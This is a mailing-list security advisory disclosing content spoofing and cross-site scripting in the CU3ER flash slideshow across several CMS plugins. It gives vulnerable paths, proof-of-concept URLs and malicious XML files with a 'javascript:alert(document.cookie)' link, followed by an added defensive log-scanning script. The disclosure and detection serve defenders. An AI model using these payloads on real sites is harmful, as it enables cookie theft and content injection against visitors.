Date: Sun, 20 Apr 2014 14:11:00 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] Vulnerabilities in plugins with CU3ER for WordPress, Joomla,
	SilverStripe and Plone

Hello list!

Recently I disclosed vulnerabilities in CU3ER
(http://seclists.org/fulldisclosure/2014/Apr/244). This is a popular flash
file, and in Google's index there are up to a million web sites with it
(inurl:cu3er.swf filetype:swf - now Google shows 994000 results).

There are many plugins for different CMSs with CU3ER. These are Content
Spoofing and Cross-Site Scripting vulnerabilities in plugins with CU3ER for
WordPress, Joomla, SilverStripe and Plone. Such plugins include: wpCU3ER for
WordPress, jCU3ER and Vinaora Cu3er 3D Slide-show for Joomla,
cu3er-silverstripe-extension for SilverStripe, and collective.cu3er for Plone.

-------------------------
Affected products:
-------------------------

Vulnerable are all plugins with flash file of CU3ER.

Vulnerable are wpCU3ER 0.75 and previous versions.

Vulnerable are jCU3ER 0.12 and previous versions.

Vulnerable are Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1 and previous
versions.

Vulnerable are all versions of cu3er-silverstripe-extension.

Vulnerable are collective.cu3er 0.1 and previous versions.

-------------------------
Affected vendors:
-------------------------

MADEBYPLAY (wpCU3ER and jCU3ER)
http://getcu3er.com

Vinaora
http://code.google.com/p/vinaora-3d-slideshow

Matt Clegg
http://www.silverstripe.org/cu3er-silverstripe-extension-module

Thomas Massmann
https://pypi.python.org/pypi/collective.cu3er/0.1

----------
Details:
----------

Path to flash-file in different plugins:

http://site/wp-content/uploads/wpcu3er/CU3ER.swf
In old versions of the plugin:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf

http://site/components/com_cu3er/flash/CU3ER.swf

http://site/media/mod_vinaora_cu3er/flash/cu3er.swf

http://site/cu3er-silverstripe-extension/flash/cu3er.swf

http://site/collective/cu3er/browser/flash/cu3er.swf

The first two plugins use the latest version of CU3ER, and the three others
use version 0.9.2 (as do old versions of wp-cu3er).

Content Spoofing (Content Injection) (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

For cross-domain attacks, a crossdomain.xml file is needed at the web site
that hosts the xml-files.

These are examples of CS and XSS attacks on CU3ER version 0.9.2. The latest
version, 1.24, needs different xml-files, and a different parameter is passed
to the flash-file.

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

File 1.xml:

<data>
  <project_settings>
    <width>800</width>
    <height>600</height>
  </project_settings>
  <settings>
    <folder_images>/</folder_images>
    <start_slide>1</start_slide>
    <auto_play>true</auto_play>
    <randomize_slides>false</randomize_slides>
    <pause_on_rollover>true</pause_on_rollover>
  </settings>
  <preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
  </preloader>
  <controls>
    <prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="15,0,0,15">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </prev_button>
    <next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="0,15,15,0">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
        <tweenOver tint="0xffffff" alpha="0.9"/>
        <tweenHide tint="0xffffff" alpha="0"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </next_button>
  </controls>
  <defaults>
    <slide time="5" color="0x000000">
      <image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
      <link>http://websecurity.com.ua</link>
    </slide>
  </defaults>
  <slides>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
    <transition rows="3" columns="5"/>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
  </slides>
</data>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

File xss.xml:

<data>
  <project_settings>
    <width>800</width>
    <height>600</height>
  </project_settings>
  <settings>
    <folder_images>/</folder_images>
    <start_slide>1</start_slide>
    <auto_play>true</auto_play>
    <randomize_slides>false</randomize_slides>
    <pause_on_rollover>true</pause_on_rollover>
  </settings>
  <preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0">
  </preloader>
  <controls>
    <prev_button align_pos="BR" width="30" height="30" x="-51" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="15,0,0,15">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/>
        <tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </prev_button>
    <next_button align_pos="BR" width="30" height="30" x="-20" y="-20">
      <auto_hide time="3">false</auto_hide>
      <hide_on_transition>true</hide_on_transition>
      <background round_corners="0,15,15,0">
        <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/>
        <tweenOver tint="0xffffff" alpha="0.9"/>
        <tweenHide tint="0xffffff" alpha="0"/>
      </background>
      <symbol type="2" align_pos="MC" x="0" y="0">
        <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/>
        <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/>
        <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/>
      </symbol>
    </next_button>
  </controls>
  <defaults>
    <slide time="5" color="0x000000">
      <image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/>
      <link>javascript:alert(document.cookie)</link>
    </slide>
  </defaults>
  <slides>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
    <transition rows="3" columns="5"/>
    <slide>
      <url><![CDATA[1.jpg]]></url>
    </slide>
  </slides>
</data>

------------
Timeline:
------------ 

2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins. Later informed developers
of the plugins.
2014.04.18 - disclosed at my site (http://websecurity.com.ua/6893/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
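
Added example (not part of the original message and not code from any of the plugins): a log check a site owner can run to find requests where cu3er.swf was pointed at an XML file on another host through the xml or xml_location parameter named in the advisory. The log lines, host names and the OWN_HOSTS set are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names from the advisory: "xml" (CU3ER 0.9.2), "xml_location" (1.24).
CONFIG_PARAMS = ("xml", "xml_location")
# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def external_config_host(target, own_hosts):
    """Return the foreign host a cu3er.swf request loads its XML from, or None."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return None
    # Plugins ship the file as CU3ER.swf or cu3er.swf, so compare in lower case.
    if not parts.path.lower().endswith("/cu3er.swf"):
        return None
    # parse_qs percent-decodes, so encoded values (http%3A%2F%2F...) are covered.
    for name in CONFIG_PARAMS:
        for value in parse_qs(parts.query).get(name, []):
            try:
                host = urlsplit(value.strip()).hostname  # also handles //host/path
            except ValueError:
                continue
            if host and host not in own_hosts:  # hostname is already lower case
                return host
    return None

def scan(lines, own_hosts):
    """Return (foreign_host, request_target) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        host = external_config_host(match.group(1), own_hosts) if match else None
        if host:
            hits.append((host, match.group(1)))
    return hits

# Constructed sample log lines (documentation addresses, example host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Apr/2014:14:11:00 +0300] "GET /wp-content/uploads/wpcu3er/CU3ER.swf?xml_location=http%3A%2F%2Fother.example%2F1.xml HTTP/1.1" 200 5123',
    '192.0.2.11 - - [20/Apr/2014:14:11:05 +0300] "GET /media/mod_vinaora_cu3er/flash/cu3er.swf?xml=/media/config.xml HTTP/1.1" 200 5123',
    '192.0.2.12 - - [20/Apr/2014:14:11:09 +0300] "GET /components/com_cu3er/flash/CU3ER.swf?xml_location=http://www.example.com/config.xml HTTP/1.1" 200 5123',
    '192.0.2.13 - - [20/Apr/2014:14:11:12 +0300] "GET /collective/cu3er/browser/flash/cu3er.swf?xml=//other.example/x.xml HTTP/1.1" 200 5123',
]
OWN_HOSTS = {"example.com", "www.example.com"}  # lower-case names of the site itself

if __name__ == "__main__":
    for host, target in scan(SAMPLE_LOG, OWN_HOSTS):
        print(f"external CU3ER config from {host}: {target}")
```

Relative and same-site values are left alone; only absolute or scheme-relative URLs naming a host outside OWN_HOSTS are reported.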


